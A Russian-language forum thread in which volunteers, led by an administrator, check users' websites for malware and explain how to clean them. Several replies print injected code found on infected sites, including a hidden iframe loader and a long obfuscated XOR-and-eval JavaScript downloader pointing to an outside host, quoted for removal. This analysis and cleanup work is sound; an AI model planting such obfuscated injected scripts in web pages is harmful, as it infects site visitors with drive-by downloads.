Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
19,517
Реакции
13,432
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

Sedoy

Активный пользователь
Сообщения
1
Реакции
0
Баллы
391
Здравствуйте, возникла проблема с вирусом на сайте _webcompmania.ru .
Ни один антивирусник не ругаеться но яндекс дает вот такую сноску «Этот сайт может угрожать безопасности вашего компьютера». Да была не сонкционированная ссылка в коде но она и код счётчика были удалены прошло некоторое время и опять яндекс вывел тот же результат , при прсмотре кода вообще ни чего не обнаружилось и так происходит уже белее трёх дней с утра заражён ближе к вечеру всё нормально. Поменял и просканировал весь комп всё FTP, браузеры не могу понять
 

tiesto77

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Добрый день. Большая просьба помочь найти вредоносный код на сайте хттп://fanmedia.org.ua. Онлайн проверка результатов не дала, но антивирус ругается (Заблокировано соединение с вредоносным сайтом...адрес левого сайта). Спасибо.
 

akok

Команда форума
Администратор
Сообщения
19,517
Реакции
13,432
Баллы
2,203
Сайт заражен. Существует скрытый iframe

PHP:
<iframe src='http://localsite.****/doc/go.php?sid=1' style='display:none;'></iframe>

Который в свою очередь "редиректит" на

PHP:
http://abs****andit.com//index.php?
Вредоносное содержимое отдает только один раз на один IP, иначе осуществляет редирект на http://www.whitehouse.gov/robots.txt

Лечение:
1. На Ftp найти файл */engine/classes/js/dle_ajax.js и убрать

PHP:
 ;document.write("<"+"i"+"f"+"rame"+" sr"+"c='http://localsite.spb.ru/doc/go.php?sid=1'"+" style='d"+"isplay:no"+"ne;
 '></"+"i"+"f"+"rame>");
А лучше файл заменить на заведомо чистый из дистрибутива.

2. Сменить пароль на ftp ресурса.

3. Проверить компьютер, с которого администрируется ресурс, на наличие вредоносного ПО.

4. Провести анализ логов Apache, для анализа следов взлома.
 

aks99

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Добрый день.
Прошу помочь. Сегодня начали жаловаться на мой сайт ввв.anitamama.ru - TROJ_JAVA.AQ .
Symantec и NOD32 не находят , а TrendMicro и еще какие-то ругаются.
Заранее спасибо !
 

akok

Команда форума
Администратор
Сообщения
19,517
Реакции
13,432
Баллы
2,203
Вечером проверю более внимательно.

Сайт заражен:
Trojan-Downloader.JS.Agent.fer
И пытается загрузить
Exploit.JS.Pdfka.bz

Добавлено через 12 минут 19 секунд
Уберите в конце листа код:

PHP:
<script language="javascript" type="text/javascript">var popAt;popAt='%85%84%86%82%82%87%83%83%f0%8f%92%91%89%89%9c%96%d9%d8%9b%9d%fc%83%88%93%d6%88%be%87%b9%88%8e%a3%93%83%ff%a1%92%8f%96%82%a5%8d%99%e5%e9%88%97%91%9a%98%92%ac%d4%ff%d0%9c%91%a4%99%8a%bf%85%85%c5%a9%d4%97%92%90%b5%8f%94%94%de%b8%83%c3%9f%89%99%ad%81%89%97%98%96%83%85%8b%b0%be%ba%c5%cf%8c%9b%81%85***%da%ca%dd%de%91%95%d7%82%8b%be%ba%94%b6%95%a4%98%92%cc%bb%81%bd%bd%82%86%a3%84%95%f4%c9%b3%93%84%8e%ab%85%83%f2%84%9e%89%ae%98%b1%cc%90%e9%c5%cb%95%cd%99%c9%94%83%bf%9a%83%94%84%d6%95%9b%df%b2%85%cb';function codeNs(rarBedAwk){function outAt(bestNetNs){var logAwk=0;var zorgBgPip=bestNetNs.length, argVipOp=0;while(argVipOp<zorgBgPip){logAwk+=outMov(bestNetNs,argVipOp)*zorgBgPip;argVipOp++;}return (logAwk+'');}function outMov(nilNet,memWait){return nilNet['c?h?ayrGCGo?d?e?A@ty'.replace(/[y@Z\?G]/g, '')](memWait);}if((new String(document.write)).indexOf('arity')>0){return;}var bcArgOp=0,imgPico=0,manArcZip=179;var cdPop='';var useModMax=(new String(codeNs)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var nanoCallAwk=outAt(useModMax);rarBedAwk=window['u%n%e/s/cDaEp%e%'.replace(/[%/lED]/g, '')](rarBedAwk);for(var midFcCal=0; midFcCal < (rarBedAwk.length); midFcCal++){var orgIn=outMov(useModMax,bcArgOp);var netArc=outMov(nanoCallAwk,imgPico);var exitGet=orgIn^netArc^manArcZip;var popBc=outMov(rarBedAwk,midFcCal);bcArgOp++,imgPico++;cdPop+=String['f~r+olm+ClhwaAr+C+o+d~e~'.replace(/[\+l~wA]/g, '')](popBc^exitGet);if(imgPico>nanoCallAwk.length)imgPico=0;if(bcArgOp>useModMax.length)bcArgOp=0;}window['eNvNa2lN'.replace(/[iDNq2]/g, '')](cdPop);return cdPop=new String();}codeNs(popAt);</script><iframe style="height: 0pt; width: 0pt; outline: medium none;" name="cpPkg" src="http://62wheel.info/t/" frameborder="0"></iframe>
 

aks99

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Спасибо !
Получилось исправить. Вредоносный код в \templates\ в каждом шаблоне index.php (Joomla)


Вечером проверю более внимательно.

Сайт заражен:
Trojan-Downloader.JS.Agent.fer
И пытается загрузить
Exploit.JS.Pdfka.bz

Добавлено через 12 минут 19 секунд
Уберите в конце листа код:

PHP:
<script language="javascript" type="text/javascript">var popAt;popAt='%85%84%86%82%82%87%83%83%f0%8f%92%91%89%89%9c%96%d9%d8%9b%9d%fc%83%88%93%d6%88%be%87%b9%88%8e%a3%93%83%ff%a1%92%8f%96%82%a5%8d%99%e5%e9%88%97%91%9a%98%92%ac%d4%ff%d0%9c%91%a4%99%8a%bf%85%85%c5%a9%d4%97%92%90%b5%8f%94%94%de%b8%83%c3%9f%89%99%ad%81%89%97%98%96%83%85%8b%b0%be%ba%c5%cf%8c%9b%81%85***%da%ca%dd%de%91%95%d7%82%8b%be%ba%94%b6%95%a4%98%92%cc%bb%81%bd%bd%82%86%a3%84%95%f4%c9%b3%93%84%8e%ab%85%83%f2%84%9e%89%ae%98%b1%cc%90%e9%c5%cb%95%cd%99%c9%94%83%bf%9a%83%94%84%d6%95%9b%df%b2%85%cb';function codeNs(rarBedAwk){function outAt(bestNetNs){var logAwk=0;var zorgBgPip=bestNetNs.length, argVipOp=0;while(argVipOp<zorgBgPip){logAwk+=outMov(bestNetNs,argVipOp)*zorgBgPip;argVipOp++;}return (logAwk+'');}function outMov(nilNet,memWait){return nilNet['c?h?ayrGCGo?d?e?A@ty'.replace(/[y@Z\?G]/g, '')](memWait);}if((new String(document.write)).indexOf('arity')>0){return;}var bcArgOp=0,imgPico=0,manArcZip=179;var cdPop='';var useModMax=(new String(codeNs)).replace(/[^@a-z0-9A-Z_.,-]/g,'');var nanoCallAwk=outAt(useModMax);rarBedAwk=window['u%n%e/s/cDaEp%e%'.replace(/[%/lED]/g, '')](rarBedAwk);for(var midFcCal=0; midFcCal < (rarBedAwk.length); midFcCal++){var orgIn=outMov(useModMax,bcArgOp);var netArc=outMov(nanoCallAwk,imgPico);var exitGet=orgIn^netArc^manArcZip;var popBc=outMov(rarBedAwk,midFcCal);bcArgOp++,imgPico++;cdPop+=String['f~r+olm+ClhwaAr+C+o+d~e~'.replace(/[\+l~wA]/g, '')](popBc^exitGet);if(imgPico>nanoCallAwk.length)imgPico=0;if(bcArgOp>useModMax.length)bcArgOp=0;}window['eNvNa2lN'.replace(/[iDNq2]/g, '')](cdPop);return cdPop=new String();}codeNs(popAt);</script><iframe style="height: 0pt; width: 0pt; outline: medium none;" name="cpPkg" src="http://62wheel.info/t/" frameborder="0"></iframe>
 
Последнее редактирование:

ahmet

Активный пользователь
Сообщения
1
Реакции
0
Баллы
391
Прошу проверить на вирусы хттп://ahmt.net Вроде ничего не ставил, а некоторые жалуются. Неудобно!!!
 

Savenkov

Активный пользователь
Сообщения
1
Реакции
0
Баллы
391
Будьте любезны, посмотрите сайты :
хттп://lendex.ru
еще жена лазит по всяким женским сайтам-форумам для похудения )))
Но вот что наловил др веб
trojan.Packed.19855
Trojan.PWS.Ibank.28
adware.SaveNow
BackDoor.FoxGrabber.1 ----- этих штук 300
общее число вирусов 429 штук
 

akok

Команда форума
Администратор
Сообщения
19,517
Реакции
13,432
Баллы
2,203
ahmet, ничего не вижу подозрительного на сайте. Необходимо больше информации.

Добавлено через 54 минуты 30 секунд
Savenkov, аналогично. Не вижу на ресурсе признаков заражения. (кнопки бы почистить).
 

NomiD

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
Проверьте пожалуйста сайт и форум на вирусы, черви, трояны и т.д., пользователи начали жаловаться что мол что то есть, но онлайн антивирусы ничего не нашли.
хттп://molodezh.kiev.ua/
хттп://molodezh.kiev.ua/forum/
 

akok

Команда форума
Администратор
Сообщения
19,517
Реакции
13,432
Баллы
2,203
Сейчас ничего явно вредоносного не вижу. Нужно больше информации о жалобах.
 

NomiD

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
HTML:
10.05.2010 13:56:00    http://molodezh.kiev.ua/favicon.ico|>{gzip} [L] HTML:Script-inf (0)
10.05.2010 13:56:14    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:57:36    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:58:36    http://molodezh.kiev.ua/forum/index.php?showtopic=16205&st=0&p=98295&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 13:59:36    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98446&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 14:46:51    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98474&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
*
* Звіт про сканування Екраном реального часу avast!
* Цей файл згенеровано автоматично
*
* Почато: 10 Травень 2010 р. 21:28:02
*

*
* Звіт про сканування Екраном реального часу avast!
* Цей файл згенеровано автоматично
*
* Почато: 10 Травень 2010 р. 22:45:04
*

10.05.2010 23:00:02    http://molodezh.kiev.ua/favicon.ico|>{gzip} [L] HTML:Script-inf (0)
10.05.2010 23:00:24    http://molodezh.kiev.ua/forum/index.php?showtopic=15298&pid=98481&st=0&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)
10.05.2010 23:00:27    http://molodezh.kiev.ua/forum/index.php?showtopic=8587&pid=98478&st=9720&|>{gzip} [L] JS:ScriptIP-inf [Trj] (0)

и на сайте и на форуме на любой странице ругается
 

akok

Команда форума
Администратор
Сообщения
19,517
Реакции
13,432
Баллы
2,203
Аваст реагирует на ссылки
хттп://tizergo.net/context.php?sid=4243&bn=jDUhHVydSve28126Tuqj&ad=0&cat=7&nod=0&sort=0&advcol=0&nap=0&pt=%D5%EE%EB%EE%E4%E8%EB%FC%ED%E8%EA%20%F1%20%E8%E7%FE%EC%E8%ED%EA%EE%E9%20-%20Molodezh.Kiev.UA&ref=
хттп://tizergo.net/tizers2.php?sid=4243&bn=HYt7bzRV2VVTS3WQfMM4&ad=0&nod=0&sort=0&tizt=0&tizw=0&pov=0&nobg=0&vref=0&vopis=0&ref=

Ставили рекламу от хттp://bodyclick.net/?
 

NomiD

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
akoK, да ставил, но с недавних пор они заблочили сайт,накрутка была, коды так и остались, так это из-за этих кодов бодиклика оно ругается что мол троян?
 

akok

Команда форума
Администратор
Сообщения
19,517
Реакции
13,432
Баллы
2,203
NomiD, или смазывает картину.
 

demiancz

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
Здравствуйте. Проверьте пожалуйста <удалено>
На одной из партнерок меня забанили. Мол сайт содержит вредоносный код хттп://img.picsa.ru/pictures/0/000/041/055/41055.png
Это вчера было. Я весь день комп чистил (троян был). Потом все пароли менял (к админке, FTP и т. д.). Но когда принялся искать чтото в коде то ничего не нашел. Никак не пойму где (и есть ли вообще) этот вредоносный код. А 2 часа наза меня Яндекс убил мол на этой странице есть вредоносный код <удалено>. Я онлайн проверками проверяю - а они ничего не показывают. Пишут мол все хорошо, сайт чист.
Помогите кто может!!!
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
19,517
Реакции
13,432
Баллы
2,203
Для справки.

Вечером буду смотреть с тестовой машины.

Пока я вижу подозрительную вставку:
PHP:
<script type="text/javascript" language="javascript">
<!--
docu*****rite("<scr"+"ipt type='text/javascript' language='javasc"+"ript' src='");
function Sr187(uL443){document.write( String.fromCharCode(parseInt(uL443)-3));}
var y602="107h119h119h115h61h50h50h103h104h112h108h"+
"100h113h1*********4h102h107h"+
"110h100h49h113h104h119h50h115h71h93h92h104h90h53h51h"+
"59h57h50h66h118h108h103h64h57h55h52h55";var Dw663=y602.split("h");
for(y*************ength;yF436++){Sr187(Dw663[yF436]);}
document.write("'></sc"+"ript>");
// -->
</script>

Если ее расшифровать, то это означает:
PHP:
<script type='text/javascript' language='javascript' src='[хттп://demia***.okoshechka.net/pDZYeW2086/?sid=6414'></script>

Это вы устанавливали этот код?
 

demiancz

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
RE

Это зашифрованный код попандера. Ставил очень давно.
Сейчас зашел на попандер. Смотрю, сейчас код отличается от того что у меня стоит. Но клики идут. Поменял код на тот который сейчас попандер предлагает.

Добавлено через 8 часов 24 минуты 17 секунд
А больше ничего подозрительного нет?

Добавлено через 18 минут 28 секунд
Если не трудно посмотрите пожалуйста еще один сайт <удалено>
Там такаяже ситуация. Проверка онлайн указывает на счетчик liveinternet и партнерку tx2. Но это врядли.
 
Последнее редактирование:
Сверху Снизу